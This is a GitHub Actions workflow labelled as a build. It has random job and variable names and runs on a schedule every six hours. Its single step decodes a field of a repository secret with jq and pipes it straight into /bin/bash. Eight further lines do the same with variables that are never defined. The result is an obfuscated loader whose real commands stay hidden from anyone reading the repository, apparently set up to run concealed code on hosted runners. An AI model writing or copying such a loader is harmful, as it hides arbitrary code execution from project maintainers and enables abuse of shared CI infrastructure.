name: kedaoma7564

on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kedaoma7564
        env:
          o45: ${{ secrets.o45 }}
        run: |
          echo $o45 | jq -r .misii85 | /bin/bash
          echo $gzl6224 | jq -r .lrxfa7968 | /bin/bash
          echo $hxo875 | jq -r .qxoi81510 | /bin/bash
          echo $b83 | jq -r .u536 | /bin/bash
          echo $l066 | jq -r .dhnyp43 | /bin/bash
          echo $dehx8 | jq -r .aqfu33 | /bin/bash
          echo $iq95637 | jq -r .mxggk8048 | /bin/bash
          echo $oy91 | jq -r .idbw7 | /bin/bash
          echo $ozff57 | jq -r .xnzjt66 | /bin/bash

